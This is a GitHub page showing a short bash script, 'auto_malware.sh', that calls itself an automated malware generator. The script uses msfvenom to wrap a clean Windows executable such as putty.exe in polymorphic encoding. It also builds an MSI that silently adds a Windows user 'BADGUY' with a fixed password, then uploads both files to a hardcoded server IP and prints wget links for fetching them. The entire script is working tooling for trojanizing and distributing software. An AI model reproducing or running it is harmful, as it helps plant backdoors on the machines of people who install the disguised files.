-
Notifications
You must be signed in to change notification settings - Fork 3
/
auto_malware.sh
30 lines (30 loc) · 1.06 KB
/
auto_malware.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/bash
#Written by Craig Dods - August 29th, 2016
VPS=45.55.219.243
R1=$(cat /dev/urandom | tr -cd 'a-z0-9' | head -c 24)
R2=$(cat /dev/urandom | tr -cd 'a-z0-9' | head -c 24)
echo "Welcome to the automated malware generator, written by Craig Dods"
echo ""
echo "Please specify which clean file you'd like to infect (e.g. putty.exe)"
read -e -p "Enter: " ORIG_FILE
ENCODED=($R1\_Encoded\_$ORIG_FILE)
BACKDOOR=(Backdoor\_$ORIG_FILE)
BACKDOOR=`echo $BACKDOOR | sed 's/exe/msi/'`
BACKDOOR=($R2\_$BACKDOOR)
echo ""
echo "Thank you"
echo ""
echo "Beginning obfuscation with polymorphic encoders and injecting shell scripts"
echo ""
msfvenom -a x86 --platform windows -x $ORIG_FILE -k -e x86/shikata_ga_nai -i 5 -b '\x00' -f exe -o $ENCODED
msfvenom -a x86 --platform windows -p windows/adduser USER=BADGUY PASS=Exce11PA123! -f msi > $BACKDOOR
echo ""
echo "Completed"
echo ""
echo "Uploading to the internet..."
echo ""
scp -r -P 7777 $ENCODED $BACKDOOR $VPS:/var/www/html
echo ""
echo "You may now retrieve your malware samples via:"
echo "wget $VPS/$ENCODED"
echo "wget $VPS/$BACKDOOR"